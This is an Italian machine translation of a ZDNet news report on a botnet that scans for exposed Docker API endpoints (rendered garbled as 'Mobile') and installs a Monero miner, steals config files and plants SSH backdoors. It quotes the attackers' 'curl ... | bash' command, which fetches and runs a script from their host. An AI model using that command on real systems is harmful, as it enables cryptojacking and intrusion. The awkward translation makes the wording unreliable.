per Zero-Day
| 26 novembre 2019 — 02:12 GMT (02:12 GMT)
| Argomento: Sicurezza
Immagine: Pannello Di ZDNet
Un gruppo di hacker è attualmente di massa-la scansione di internet alla ricerca di finestra Mobile di piattaforme che sono API endpoint esposti online.
Lo scopo di queste analisi è quello di consentire al gruppo di hacker di inviare comandi al Mobile istanza e la distribuzione di un cryptocurrency minatore di una società Mobile istanze, per generare fondi per i propri profitti.
Una gestione professionale
Questo particolare massa-operazione di scansione è iniziato durante il fine settimana, il 24 novembre, e subito distinti per la sua vastità.
“Gli utenti dei Pacchetti Cattivi CTI API si nota che sfruttano le attività di targeting esposto Mobile istanze è nulla di nuovo, e succede spesso,” Troy Mursch, chief research officer e co-fondatore di Bad Packets LLC, ha detto a ZDNet oggi.
“E’ quello che questa campagna a parte è stato il grande incremento delle attività di scansione. Questo solo garantito ulteriori indagini per scoprire che cosa questo botnet è stato fino a,” ha detto.
“Come altri hanno notato [1, 2], questa non è la vostra media script kiddie tentativo di exploit,” Mursch, che ha scoperto la campagna, ci ha detto. “C’è stato un moderato livello di sforzo messo in questa campagna, e non abbiamo analizzato ogni singola cosa che fa ancora.”
Opportunistiche massa scansione di attività rilevate targeting esposto Mobile API endpoint.
Queste scansioni creare un contenitore utilizzando un Alpino immagine di Linux, e di eseguire il payload via:
“Comando”: “chroot /mnt /bin/sh -c ‘curl -sL4 https://t.co/q047bRPUyj | bash;'”,#threatintel pic.twitter.com/vxszV5SF1o— Bad Pacchetti di Report (@bad_packets) 25 novembre 2019
Quello che sappiamo finora
Quello che sappiamo finora è che il gruppo dietro a questi attacchi, è attualmente la scansione di più di 59.000 reti IP (netblocks) ricerca per Mobile esposto istanze.
Una volta che il gruppo identifica un esposto host, gli aggressori utilizzano l’endpoint API per avviare un Alpine Linux OS contenitore dove eseguire il seguente comando:
chroot /mnt /bin/sh -c ‘curl -sL4 http://ix.io/1XQa | bash;
Il comando di cui sopra si scarica e si esegue uno script Bash da aggressori’ server. Questo script installa un classico XMRRig cryptocurrency minatore. Nei due giorni dal momento che questa campagna è stata attiva, gli hacker hanno già estratto 14.82 Monero monete (XMR), del valore di poco più di $740, Mursch notato.
Inoltre, questo malware operazione viene fornito anche con un auto-difesa di misura.
“Una poco originale ma interessante funzione della campagna è che, disinstalla noti agenti di monitoraggio e uccide un sacco di processi tramite uno script scaricato da http://ix[.]io/1XQh,” Mursch ci ha detto.
Guardando attraverso questo script, solo che gli hacker sono disattivazione di prodotti per la sicurezza, ma sono l’arresto lso processi associati con la rivale cryptocurrency-mining botnet, come il DDG.
Inoltre, Mursch scoperto anche una funzione di script dannoso che effettua la scansione di un host infetto per rConfig file di configurazione, che consente di crittografare e ruba, per l’invio di file del gruppo server di comando e controllo.
Inoltre, Craig H. Rowland, fondatore di Flebotomi di Sicurezza, ha anche notato che gli hacker sono anche la creazione di backdoor conti sul hacked contenitori, e lasciando le chiavi SSH dietro per un accesso più facile, e un modo per controllare tutti i bot da una posizione remota.
Per il momento, Mursch raccomanda che gli utenti e le organizzazioni che gestiscono Mobile istanze di verificare immediatamente se espone API endpoint su internet, chiudere le porte, e quindi terminare non riconosciuto in esecuzione contenitori.
Sicurezza
Chrome, Edge, Safari violato elite Cinese hacking contest
Migliaia di hacked Disney+ conti sono già in vendita sul forum di hacking
Sicurezza informatica si sta dirigendo in una crisi di reclutamento: Ecco come risolvere il problema
Fissaggio di fughe di dati in Jira (ZDNet YouTube)
Migliore di sicurezza domestica del 2019: monitoraggio Professionale e fai da te (CNET)
Come controllare la posizione di inseguimento sul tuo iPhone in iOS 13 (TechRepublic)
Argomenti Correlati:
Cloud
Di sicurezza, TV
La Gestione Dei Dati
CXO
Centri Dati
per Zero-Day
| 26 novembre 2019 — 02:12 GMT (02:12 GMT)
| Argomento: Sicurezza